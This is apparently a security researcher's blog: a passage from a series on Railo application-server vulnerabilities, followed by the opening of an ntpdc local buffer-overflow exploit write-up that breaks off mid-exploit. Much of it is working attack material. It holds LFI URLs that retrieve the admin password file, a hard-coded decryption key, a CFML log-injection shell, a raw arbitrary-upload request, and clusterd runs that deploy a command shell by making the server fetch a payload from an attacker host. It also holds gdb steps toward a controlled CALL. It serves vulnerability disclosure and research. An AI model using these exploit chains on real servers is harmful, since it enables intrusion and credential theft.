            return config.getId();
        }

Here we return the ID of the caller (our ID, for reference, is what we’re currently tracking down!), which calls down into config.getId:

1
2
3
4
5
6
7
   @Override
    public String getId() {
        if(id==null){
            id = getId(getSecurityKey(),getSecurityToken(),false,securityKey);
        }
        return id;
    }

Here we invoke getId which, if null, calls down into an overloaded getId which takes a security key and a security token, along with a boolean (false) and some global securityKey value. Here’s the function in its entirety:

1
2
3
4
5
6
7
8
9
10
11
12
public static String getId(String key, String token,boolean addMacAddress,String defaultValue) {

    try {
        if(addMacAddress){// because this was new we could swutch to a new ecryption // FUTURE cold we get rid of the old one?
            return Hash.sha256(key+";"+token+":"+SystemUtil.getMacAddress());
        }
        return Md5.getDigestAsString(key+token);
    }
    catch (Throwable t) {
        return defaultValue;
    }
}

Our ID generation is becoming clear; it’s essentially the MD5 of key + token, the key being returned from getSecurityKey and the token coming from getSecurityToken. These functions are simply getters for private global variables in the ConfigImpl class, but tracking down their generation is fairly trivial. All state initialization takes place in ConfigWebFactory.java. Let’s first check out the security key:

1
2
3
4
5
6
7
8
9
10
11
12
private static void loadId(ConfigImpl config) {
        Resource res = config.getConfigDir().getRealResource("id");
        String securityKey = null;
        try {
            if (!res.exists()) {
                res.createNewFile();
                IOUtil.write(res, securityKey = UUIDGenerator.getInstance().generateRandomBasedUUID().toString(), SystemUtil.getCharset(), false);
            }
            else {
                securityKey = IOUtil.toString(res, SystemUtil.getCharset());
            }
        }

Okay, so our key is a randomly generated UUID from the safehaus library. This isn’t very likely to be guessed/brute-forced, but the value is written to a file in a consistent place. We’ll return to this.

The second value we need to calculate is the security token, which is set in ConfigImpl:

1
2
3
4
5
6
7
8
9
10
11
public String getSecurityToken() {
        if(securityToken==null){
            try {
                securityToken = Md5.getDigestAsString(getConfigDir().getAbsolutePath());
            }
            catch (IOException e) {
                return null;
            }
        }
        return securityToken;
    }

Gah! This is predictable/leaked! The token is simply the MD5 of our configuration directory, which in my case is C:\Documents and Settings\bryan\My Documents\Downloads\railo-express-4.0.4.001-jre-win32\webapps\www\WEB-INF\railo So let’s see if this works.

We MD5 the directory (20132193c7031326cab946ef86be8c74), then prefix this with the random UUID (securityKey) to finally get:

1
2
$ echo -n "3ec59952-b5de-4502-b9d7-e680e5e2071820132193c7031326cab946ef86be8c74" | md5sum
a898c2525c001da402234da94f336d55  -

Ah-ha! Our session file will then be web-a898c2525c001da402234da94f336d55.cfm, which exactly lines up with what we’re seeing:

I mentioned that the config directory is leaked; default Railo is pretty promiscuous:

As you can see, from this we can derive the base configuration directory and figure out one half of the session filename. We now turn our attention to figuring out exactly what the securityKey is; if we recall, this is a randomly generated UUID that is then written out to a file called id.

There are two options here; one, guess or predict it, or two, pull the file with an LFI. As alluded to in part one, we can set the error handler to any file on the system we want. As we’re in the mood to discuss post-authentication issues, we can harness this to fetch the required id file containing this UUID:

When we then access a non-existant page, we trigger the template and the system returns our file:

By combining these specific vectors and inherit weaknesses in the Railo architecture, we can obtain post-authentication RCE without forcing the server to connect back. This can be particularly useful when the Task Scheduler just isn’t an option. This vulnerability has been implemented into clusterd as an auxiliary module, and is available in the latest dev build (0.3.1). A quick example of this:

I mentioned briefly at the start of this post that there were β€œseveral” post-authentication RCE vulnerabilities. Yes. Several. The one documented above was fun to find and figure out, but there is another way that’s much cleaner. Railo has a function that allows administrators to set logging information, such as level and type and location. It also allows you to create your own logging handlers:

Here we’re building an HTML layout log file that will append all ERROR logs to the file. And we notice we can configure the path and the title. And the log extension. Easy win. By modifying the path to /context/my_file.cfm and setting the title to <cfdump var="#session#"> we can execute arbitrary commands on the file system and obtain shell access. The file is not created once you create the log, but once you select Edit and then Submit for some reason. Here’s the HTML output that’s, by default, stuck into the file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title><cfdump var="#session#"></title>
<style type="text/css">
<!--
body, table {font-family: arial,sans-serif; font-size: x-small;}
th {background: #336699; color: #FFFFFF; text-align: left;}
-->
</style>
</head>
<body bgcolor="#FFFFFF" topmargin="6" leftmargin="6">
<hr size="1" noshade>
Log session start time Mon Jun 30 23:06:17 MDT 2014<br>
<br>
<table cellspacing="0" cellpadding="4" border="1" bordercolor="#224466" width="100%">
<tr>
<th>Time</th>
<th>Thread</th>
<th>Level</th>
<th>Category</th>
<th>Message</th>
</tr>
</table>
<br>
</body></html>

Note our title contains the injected command. Here’s execution:

Using this method we can, again, inject a shell without requiring the use of any reverse connections, though that option is of course available with the help of the cfhttp tag.

Another fun post-authentication feature is the use of data sources. In Railo, you can craft a custom data source, which is a user-defined database abstraction that can be used as a filesystem. Here’s the definition of a MySQL data source:

With this defined, we can set all client session data to be stored in the database, allowing us to harvest session ID’s and plaintext credentials (see part one). Once the session storage is set to the created database, a new table will be created (cf_session_data) that will contain all relevant session information, including symmetrically-encrypted passwords.

Part three and four of this series will begin to dive into the good stuff, where we’ll discuss several pre-authentication vulnerabilities that we can use to obtain credentials and remote code execution on a Railo host.

railo security - part three - pre-authentication LFI

23 August 2014 at 21:00

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication LFI
Part four – pre-authentication rce

This post continues our four part Railo security analysis with three pre-authentication LFI vulnerabilities. These allow anonymous users access to retrieve the administrative plaintext password and login to the server’s administrative interfaces. If you’re unfamiliar with Railo, I recommend at the very least reading part one of this series. The most significant LFI discussed has been implemented as auxiliary modules in clusterd, though they’re pretty trivial to exploit on their own.

We’ll kick this portion off by introducing a pre-authentication LFI vulnerability that affects all versions of Railo Express; if you’re unfamiliar with the Express install, it’s really just a self-contained, no-installation-necessary package that harnesses Jetty to host the service. The flaw actually has nothing to do with Railo itself, but rather in this packaged web server, Jetty. CVE-2007-6672 addresses this issue, but it appears that the Railo folks have not bothered to update this. Via the browser, we can pull the config file, complete with the admin hash, with http://[host]:8888/railo-context/admin/..\..\railo-web.xml.cfm.

A quick run of this in clusterd on Railo 4.0:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ ./clusterd.py -i 192.168.1.219 -a railo -v4.0 --rl-pw

        clusterd/0.3 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-15 06:25PM] Started at 2014-05-15 06:25PM
 [2014-05-15 06:25PM] Servers' OS hinted at windows
 [2014-05-15 06:25PM] Fingerprinting host '192.168.1.219'
 [2014-05-15 06:25PM] Server hinted at 'railo'
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Server...
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Server Administrator...
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Web Administrator...
 [2014-05-15 06:25PM] Matched 3 fingerprints for service railo
 [2014-05-15 06:25PM]   Railo Server (version 4.0)
 [2014-05-15 06:25PM]   Railo Server Administrator (version 4.0)
 [2014-05-15 06:25PM]   Railo Web Administrator (version 4.0)
 [2014-05-15 06:25PM] Fingerprinting completed.
 [2014-05-15 06:25PM] Attempting to pull password...
 [2014-05-15 06:25PM] Fetched encrypted password, decrypting...
 [2014-05-15 06:25PM] Decrypted password: default
 [2014-05-15 06:25PM] Finished at 2014-05-15 06:25PM

and on the latest release of Railo, 4.2:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ ./clusterd.py -i 192.168.1.219 -a railo -v4.2 --rl-pw

        clusterd/0.3 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-15 06:28PM] Started at 2014-05-15 06:28PM
 [2014-05-15 06:28PM] Servers' OS hinted at windows
 [2014-05-15 06:28PM] Fingerprinting host '192.168.1.219'
 [2014-05-15 06:28PM] Server hinted at 'railo'
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Server...
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Server Administrator...
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Web Administrator...
 [2014-05-15 06:28PM] Matched 3 fingerprints for service railo
 [2014-05-15 06:28PM]   Railo Server (version 4.2)
 [2014-05-15 06:28PM]   Railo Server Administrator (version 4.2)
 [2014-05-15 06:28PM]   Railo Web Administrator (version 4.2)
 [2014-05-15 06:28PM] Fingerprinting completed.
 [2014-05-15 06:28PM] Attempting to pull password...
 [2014-05-15 06:28PM] Fetched password hash: d34535cb71909c4821babec3396474d35a978948455a3284fd4e1bc9c547f58b
 [2014-05-15 06:28PM] Finished at 2014-05-15 06:28PM

Using this LFI, we can pull the railo-web.xml.cfm file, which contains the administrative password. Notice that 4.2 only dumps a hash, whilst 4.0 dumps a plaintext password. This is because versions <= 4.0 blowfish encrypt the password, and > 4.0 actually hashes it. Here’s the relevant code from Railo (ConfigWebFactory.java):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
private static void loadRailoConfig(ConfigServerImpl configServer, ConfigImpl config, Document doc) throws IOException  {
        Element railoConfiguration = doc.getDocumentElement();

        // password
        String hpw=railoConfiguration.getAttribute("pw");
        if(StringUtil.isEmpty(hpw)) {
            // old password type
            String pwEnc = railoConfiguration.getAttribute("password"); // encrypted password (reversable)
            if (!StringUtil.isEmpty(pwEnc)) {
                String pwDec = new BlowfishEasy("tpwisgh").decryptString(pwEnc);
                hpw=hash(pwDec);
            }
        }
        if(!StringUtil.isEmpty(hpw))
            config.setPassword(hpw);
        else if (configServer != null) {
            config.setPassword(configServer.getDefaultPassword());
        }

As above, they actually encrypted the password using a hard-coded symmetric key; this is where versions <= 4.0 stop. In > 4.0, after decryption they hash the password (SHA256) and use it as such. Note that the encryption/decryption is no longer the actual password in > 4.0, so we cannot simply decrypt the value to use and abuse.

Due to the configuration of the web server, we can only pull CFM files; this is fine for the configuration file, but system files prove troublesome…

The second LFI is a trivial XXE that affects versions <= 4.0, and is exploitable out-of-the-box with Metasploit. Unlike the Jetty LFI, this affects all versions of Railo, both installed and express:

Using this we cannot pull railo-web.xml.cfm due to it containing XML headers, and we cannot use the standard OOB methods for retrieving files. Timothy Morgan gave a great talk at OWASP Appsec 2013 that detailed a neat way of abusing Java XML parsers to obtain RCE via XXE. The process is pretty interesting; if you submit a URL with a jar:// protocol handler, the server will download the zip/jar to a temporary location, perform some header parsing, and then delete it. However, if you push the file and leave the connection open, the file will persist. This vector, combined with one of the other LFI’s, could be a reliable pre-authentication RCE, but I was unable to get it working.

The third LFI is just as trivial as the first two, and again stems from the pandemic problem of failing to authenticate at the URL/page level. img.cfm is a file used to, you guessed it, pull images from the system for display. Unfortunately, it fails to sanitize anything:

1
2
3
4
5
6
7
8
<cfset path="resources/img/#attributes.src#.cfm">
<cfparam name="application.adminimages" default="#{}#">
<cfif StructKeyExists(application.adminimages,path) and false>
    <cfset str=application.adminimages[path]>
<cfelse>
    <cfsavecontent variable="str" trim><cfinclude template="#path#"></cfsavecontent>
    <cfset application.adminimages[path]=str>
</cfif>

By fetching this page with attributes.src set to another CFM file off elsewhere, we can load the file and execute any tags contained therein. As we’ve done above, lets grab railo-web.xml.cfm; we can do this with the following url: http://host:8888/railo-context/admin/img.cfm?attributes.src=../../../../railo-web.xml&thistag.executionmode=start which simply returns

1
<?xml version="1.0" encoding="UTF-8"?><railo-configuration pw="d34535cb71909c4821babec3396474d35a978948455a3284fd4e1bc9c547f58b" version="4.2">

This vulnerability exists in 3.3 – 4.2.1 (latest), and is exploitable out-of-the-box on both Railo installed and Express editions. Though you can only pull CFM files, the configuration file dumps plenty of juicy information. It may also be beneficial for custom tags, plugins, and custom applications that may house other vulnerable/sensitive information hidden away from the URL.

Curiously, at first glance it looks like it may be possible to turn this LFI into an RFI. Unfortunately it’s not quite that simple; if we attempt to access a non-existent file, we see the following:

1
The error occurred in zip://C:\Documents and Settings\bryan\My Documents\Downloads\railo\railo-express-4.2.1.000-jre-win32\webapps\ROOT\WEB-INF\railo\context\railo-context.ra!/admin/img.cfm: line 29

Notice the zip:// handler. This prevents us from injecting a path to a remote host with any other handler. If, however, the tag looked like this:

1
<cfinclude>#attributes.src#</cfinclude>

Then it would have been trivially exploitable via RFI. As it stands, it’s not possible to modify the handler without prior code execution.

To sum up the LFI’s: all versions and all installs are vulnerable via the img.cfm vector. All versions and all express editions are vulnerable via the Jetty LFI. Versions <= 4.0 and all installs are vulnerable to the XXE vector. This gives us reliable LFI in all current versions of Railo.

This concludes our pre-authentication LFI portion of this assessment, which will crescendo with our final post detailing several pre-authentication RCE vulnerabilities. I expect a quick turnaround for part four, and hope to have it out in a few days. Stay tuned!

railo security - part four - pre-auth remote code execution

27 August 2014 at 21:00

Part one – intro
Part two – post-auth rce
Part three – pre-auth password retrieval
Part four – pre-auth remote code execution

This post concludes our deep dive into the Railo application server by detailing not only one, but two pre-auth remote code execution vulnerabilities. If you’ve skipped the first three parts of this blog post to get to the juicy stuff, I don’t blame you, but I do recommend going back and reading them; there’s some important information and details back there. In this post, we’ll be documenting both vulnerabilities from start to finish, along with some demonstrations and notes on clusterd’s implementation on one of these.

The first RCE vulnerability affects versions 4.1 and 4.2.x of Railo, 4.2.1 being the latest release. Our vulnerability begins with the file thumbnail.cfm, which Railo uses to store admin thumbnails as static content on the server. As previously noted, Railo relies on authentication measures via the cfadmin tag, and thus none of the cfm files actually contain authentication routines themselves.

thumbnail.cfm first generates a hash of the image along with it’s width and height:

1
2
3
<cfset url.img=trim(url.img)>
<cfset id=hash(url.img&"-"&url.width&"-"&url.height)>
<cfset mimetypes={png:'png',gif:'gif',jpg:'jpeg'}>

Once it’s got a hash, it checks if the file exists, and if not, attempts to read and write it down:

1
2
3
4
5
6
7
8
9
10
11
12
13
<cffile action="readbinary" file="#url.img#" variable="data">
<cfimage action="read" source="#data#" name="img">

<!--- shrink images if needed --->
<cfif img.height GT url.height or img.width GT url.width>
    <cfif img.height GT url.height >
        <cfimage action="resize" source="#img#" height="#url.height#" name="img">
    </cfif>
    <cfif img.width GT url.width>
        <cfimage action="resize" source="#img#" width="#url.width#" name="img">
    </cfif>
    <cfset data=toBinary(img)>
</cfif>

The cffile tag is used to read the raw image and then cast it via the cfimage tag. The wonderful thing about cffile is that we can provide URLs that it will arbitrarily retrieve. So, our URL can be this:

1
192.168.1.219:8888/railo-context/admin/thumbnail.cfm?img=http://192.168.1.97:8000/my_image.png&width=5000&height=50000

And Railo will go and fetch the image and cast it. Note that if a height and width are not provided it will attempt to resize it; we don’t want this, and thus we provide large width and height values. This file is written out to /railo/temp/admin-ext-thumbnails/[HASH].[EXTENSION].

We’ve now successfully written a file onto the remote system, and need a way to retrieve it. The temp folder is not accessible from the web root, so we need some sort of LFI to fetch it. Enter jsloader.cfc.

jsloader.cfc is a Railo component used to fetch and load Javascript files. In this file is a CF tag called get, which accepts a single argument lib, which the tag will read and return. We can use this to fetch arbitrary Javascript files on the system and load them onto the page. Note that it MUST be a Javascript file, as the extension is hard-coded into the file and null bytes don’t work here, like they would in PHP. Here’s the relevant code:

1
2
3
4
5
6
7
8
<cfset var filePath = expandPath('js/#arguments.lib#.js')/>
    <cfset var local = {result=""} /><cfcontent type="text/javascript">
        <cfsavecontent variable="local.result">
            <cfif fileExists(filePath)>
                <cfinclude template="js/#arguments.lib#.js"/>
            </cfif>
        </cfsavecontent>
    <cfreturn local.result />

Let’s tie all this together. Using thumbnail.cfm, we can write well-formed images to the file system, and using the jsloader.cfc file, we can read arbitrary Javascript. Recall how log injection works with PHP; we can inject PHP tags into arbitrary files so long as the file is loaded by PHP, and parsed accordingly. We can fill a file full of junk, but if the parser has its way a single <?phpinfo();?> will be discovered and executed; the CFML engine works the same way.

Our attack becomes much more clear: we generate a well-formed PNG file, embed CFML code into the image (metadata), set the extension to .js, and write it via thumbnail.cfm. We then retrieve the file via jsloader.cfc and, because we’re loading it with a CFM file, it will be parsed and executed. Let’s check this out:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ ./clusterd.py -i 192.168.1.219 -a railo -v4.1 --deploy ./src/lib/resources/cmd.cfml --deployer jsload

        clusterd/0.3.1 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-06-15 03:39PM] Started at 2014-06-15 03:39PM
 [2014-06-15 03:39PM] Servers' OS hinted at windows
 [2014-06-15 03:39PM] Fingerprinting host '192.168.1.219'
 [2014-06-15 03:39PM] Server hinted at 'railo'
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Server...
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Server Administrator...
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Web Administrator...
 [2014-06-15 03:39PM] Matched 2 fingerprints for service railo
 [2014-06-15 03:39PM]   Railo Server Administrator (version 4.1)
 [2014-06-15 03:39PM]   Railo Web Administrator (version 4.1)
 [2014-06-15 03:39PM] Fingerprinting completed.
 [2014-06-15 03:39PM] This deployer (jsload_lfi) requires an external listening port (8000).  Continue? [Y/n] > 
 [2014-06-15 03:39PM] Preparing to deploy cmd.cfml...
 [2014-06-15 03:40PM] Waiting for remote server to download file [5s]]
 [2014-06-15 03:40PM] Invoking stager and deploying payload...
 [2014-06-15 03:40PM] Waiting for remote server to download file [7s]]
 [2014-06-15 03:40PM] cmd.cfml deployed at /railo-context/cmd.cfml
 [2014-06-15 03:40PM] Finished at 2014-06-15 03:40PM

A couple things to note; as you may notice, the module currently requires the Railo server to connect back twice. Once is for the image with embedded CFML, and the second for the payload. We embed only a stager in the image that then connects back for the actual payload.

Sadly, the LFI was unknowingly killed in 4.2.1 with the following fix to jsloader.cfc:

1
2
3
4
<cfif arguments.lib CT "..">
    <cfheader statuscode="400">
    <cfreturn "// 400 - Bad Request">
</cfif>

The arguments.lib variable contains our controllable path, but it kills our ability to traverse out. Unfortunately, we can’t substitute the .. with unicode or utf-16 due to the way Jetty and Java are configured, by default. This file is pretty much useless to us now, unless we can write into the folder that jsloader.cfc reads from; then we don’t need to traverse out at all.

We can still pop this on Express installs, due to the Jetty LFI discussed in part 3. By simply traversing into the extensions folder, we can load up the Javascript file and execute our shell. Railo installs still prove elusive.

buuuuuuuuuuuuuuuuuuuuuuuuut

Recall the img.cfm LFI from part 3; by tip-toeing back into the admin-ext-thumbnails folder, we can summon our vulnerable image and execute whatever coldfusion we shove into it. This proves to be an even better choice than jsloader.cfc, as we don’t need to traverse as far. This bug only affects versions 4.1 – 4.2.1, as thumbnail.cfm wasn’t added until 4.1. CVE-2014-5468 has been assigned to this issue.

The second RCE vulnerability is a bit easier and has a larger attack vector, spanning all versions of Railo. As previously noted, Railo does not do per page/URL authentication, but rather enforces it when making changes via the <cfadmin> tag. Due to this, any pages doing naughty things without checking with the tag may be exploitable, as previously seen. Another such file is overview.uploadNewLangFile.cfm:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<cfif structKeyExists(form, "newLangFile")>
    <cftry>
        <cffile action="UPLOAD" filefield="form.newLangFile" destination="#expandPath('resources/language/')#" nameconflict="ERROR">
        <cfcatch>
            <cfthrow message="#stText.overview.langAlreadyExists#">
        </cfcatch>
    </cftry>
    <cfset sFile = expandPath("resources/language/" & cffile.serverfile)>
    <cffile action="READ" file="#sFile#" variable="sContent">
    <cftry>
        <cfset sXML     = XMLParse(sContent)>
        <cfset sLang    = sXML.language.XMLAttributes.label>
        <cfset stInLang = GetFromXMLNode(sXML.XMLRoot.XMLChildren)>
        <cfcatch>
            <cfthrow message="#stText.overview.ErrorWhileReadingLangFile#">
        </cfcatch>
    </cftry>

I mean, this might as well be an upload form to write arbitrary files. It’s stupid simple to get arbitrary data written to the system:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /railo-context/admin/overview.uploadNewLangFile.cfm HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8888/railo-context/admin/server.cfm
Connection: keep-alive
Content-Type: multipart/form-data; boundary=AaB03x
Content-Length: 140

--AaB03x
Content-Disposition: form-data; name="newLangFile"; filename="xxxxxxxxx.lang"
Content-Type: text/plain

thisisatest
--AaB03x--

The tricky bit is where it’s written to; Railo uses a compression system that dynamically generates compressed versions of the web server, contained within railo-context.ra. A mirror of these can be found under the following:

1
[ROOT]\webapps\ROOT\WEB-INF\railo\temp\compress

The compressed data is then obfuscated behind two more folders, both MD5s. In my example, it becomes:

1
[ROOT]\webapps\ROOT\WEB-INF\railo\temp\compress\88d817d1b3c2c6d65e50308ef88e579c\0bdbf4d66d61a71378f032ce338258f2

So we cannot simply traverse into this path, as the hashes change every single time a file is added, removed, or modified. I’ll walk the logic used to generate these, but as a precusor, we aren’t going to figure these out without some other fashionable info disclosure bug.

The hashes are calculated in railo-java/railo-core/src/railo/commons/io/res/type/compress/Compress.java:

1
2
3
4
5
6
7
8
9
10
11
12
temp=temp.getRealResource("compress");                
temp=temp.getRealResource(MD5.getDigestAsString(cid+"-"+ffile.getAbsolutePath()));
if(!temp.exists())temp.createDirectory(true);
}
catch(Throwable t){}
}

    if(temp!=null) {
        String name=Caster.toString(actLastMod)+":"+Caster.toString(ffile.length());
        name=MD5.getDigestAsString(name,name);
        root=temp.getRealResource(name);
        if(actLastMod>0 && root.exists()) return;

The first hash is then cid + "-" + ffile.getAbsolutePath(), where cid is the randomly generated ID found in the id file (see part two) and ffile.getAbsolutePath() is the full path to the classes resource. This is doable if we have the XXE, but 4.1+ is inaccessible.

The second hash is actLastMode + ":" + ffile.length(), where actLastMode is the last modified time of the file and ffile.length() is the obvious file length. Again, this is likely not brute forcable without a serious infoleak vulnerability. Hosts <= 4.0 are exploitable, as we can list files with the XXE via the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
bryan@debdev:~/tools/clusterd$ python http_test_xxe.py 
88d817d1b3c2c6d65e50308ef88e579c

[SNIP - in which we modify the path to include ^]

bryan@debdev:~/tools/clusterd$ python http_test_xxe.py
0bdbf4d66d61a71378f032ce338258f2

[SNIP - in which we modify the path to include ^]

bryan@debdev:~/tools/clusterd$ python http_test_xxe.py
admin
admin_cfc$cf.class
admin_cfm$cf.class
application_cfc$cf.class
application_cfm$cf.class
component_cfc$cf.class
component_dump_cfm450$cf.class
doc
doc_cfm$cf.class
form_cfm$cf.class
gateway
graph_cfm$cf.class
jquery_blockui_js_cfm1012$cf.class
jquery_js_cfm322$cf.class
META-INF
railo_applet_cfm270$cf.class
res
templates
wddx_cfm$cf.class

http_test_xxe.py is just a small hack I wrote to exploit the XXE, in which we eventually obtain both valid hashes. So we can exploit this in versions <= 4.0 Express. Later versions, as far as I can find, have no discernible way of obtaining full RCE without another infoleak or resorting to a slow, loud, painful death of brute forcing two MD5 hashes.

The first RCE is currently available in clusterd dev, and a PR is being made to Metasploit thanks to @BrandonPrry. Hopefully it can be merged shortly.

As we conclude our Railo analysis, lets quickly recap the vulnerabilities discovered during this audit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Version 4.2:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express) (Up to version 4.2.0)
Version 4.1:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express)
Version 4.0:
    - Pre-authentication LFI via XXE (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication RCE via XXE and `overview.uploadNewLangFile` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
Version 3.x:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication LFI via XXE (Install/Express)
    - Pre-authentication RCE via XXE and `overview.uploadNewLangFile` (Express)

This does not include the random XSS bugs or post-authentication issues. At the end of it all, this appears to be a framework with great ideas, but desperately in need of code TLC. Driving forward with a checklist of features may look nice on a README page, but the desolate wasteland of code left behind can be a scary thing. Hopefully the Railo guys take note and spend some serious time evaluating and improving existing code. The bugs found during this series have been disclosed to the developers; here’s to hoping they follow through.

ntpdc local buffer overflow

6 January 2015 at 21:10

Alejandro Hdez (@nitr0usmx) recently tweeted about a trivial buffer overflow in ntpdc, a deprecated NTP query tool still available and packaged with any NTP install. He posted a screenshot of the crash as the result of a large buffer passed into a vulnerable gets call. After digging into it a bit, I decided it’d be a fun exploit to write, and it was. There are a few quarks to it that make it of particular interest, of which I’ve detailed below.

As noted, the bug is the result of a vulnerable gets, which can be crashed with the following:

1
2
3
$ python -c 'print "A"*600' | ntpdc
***Command `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' unknown
Segmentation fault

Loading into gdb on an x86 Debian 7 system:

1
2
3
4
5
6
7
8
9
10
11
12
gdb-peda$ i r eax edx esi
eax            0x41414141   0x41414141
edx            0x41414141   0x41414141
esi            0x41414141   0x41414141
gdb-peda$ x/i $eip
=> 0xb7fa1d76 <el_gets+22>: mov    eax,DWORD PTR [esi+0x14]
gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : ENABLED
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

Notice the checksec results of the binary, now compare this to a snippet of the paxtest output:

1
2
3
4
5
6
7
8
9
10
Mode: Blackhat
Linux deb7-32 3.2.0-4-486 #1 Debian 3.2.63-2+deb7u2 i686 GNU/Linux

Executable anonymous mapping             : Vulnerable
Executable bss                           : Vulnerable
Executable data                          : Vulnerable
Executable heap                          : Vulnerable
Executable stack                         : Vulnerable
Executable shared library bss            : Vulnerable
Executable shared library data           : Vulnerable

And the result of Debian’s recommended hardening-check:

1
2
3
4
5
6
7
$ hardening-check /usr/bin/ntpdc 
/usr/bin/ntpdc:
 Position Independent Executable: no, normal executable!
 Stack protected: yes
 Fortify Source functions: yes (some protected functions found)
 Read-only relocations: yes
 Immediate binding: no, not found!

Interestingly enough, I discovered this oddity after I had gained code execution in a place I shouldn’t have. We’re also running with ASLR enabled:

1
2
$ cat /proc/sys/kernel/randomize_va_space 
2

I’ll explain why the above is interesting in a moment.

So in our current state, we control three registers and an instruction dereferencing ESI+0x14. If we take a look just a few instructions ahead, we see the following:

1
2
3
4
5
6
7
8
gdb-peda$ x/8i $eip
=> 0xb7fa1d76 <el_gets+22>: mov    eax,DWORD PTR [esi+0x14] ; deref ESI+0x14 and move into EAX
   0xb7fa1d79 <el_gets+25>: test   al,0x2                   ; test lower byte against 0x2
   0xb7fa1d7b <el_gets+27>: je     0xb7fa1df8 <el_gets+152> ; jump if ZF == 1
   0xb7fa1d7d <el_gets+29>: mov    ebp,DWORD PTR [esi+0x2c] ; doesnt matter 
   0xb7fa1d80 <el_gets+32>: mov    DWORD PTR [esp+0x4],ebp  ; doesnt matter
   0xb7fa1d84 <el_gets+36>: mov    DWORD PTR [esp],esi      ; doesnt matter
   0xb7fa1d87 <el_gets+39>: call   DWORD PTR [esi+0x318]    ; call a controllable pointer 

I’ve detailed the instructions above, but essentially we’ve got a free CALL. In order to reach this, we need an ESI value that at +0x14 will set ZF == 0 (to bypass the test/je) and at +0x318 will point into controlled data.

Naturally, we should figure out where our payload junk is and go from there.

1
2
3
4
5
6
7
8
9
10
11
12
13
gdb-peda$ searchmem 0x41414141
Searching for '0x41414141' in: None ranges
Found 751 results, display max 256 items:
 ntpdc : 0x806ab00 ('A' <repeats 200 times>...)
gdb-peda$ maintenance i sections
[snip]
0x806a400->0x806edc8 at 0x00021400: .bss ALLOC
gdb-peda$ vmmap
Start      End        Perm  Name
0x08048000 0x08068000 r-xp  /usr/bin/ntpdc
0x08068000 0x08069000 r--p  /usr/bin/ntpdc
0x08069000 0x0806b000 rw-p  /usr/bin/ntpdc
[snip]

Our payload is copied into BSS, which is beneficial as this will remain unaffected by ASLR, further bonus points because our binary wasn’t compiled with PIE. We now need to move back -0x318 and look for a value that will set ZF == 0 with the test al,0x2 instruction. A value at 0x806a9e1 satisfies both the +0x14 and +0x318 requirements:

1
2
3
4
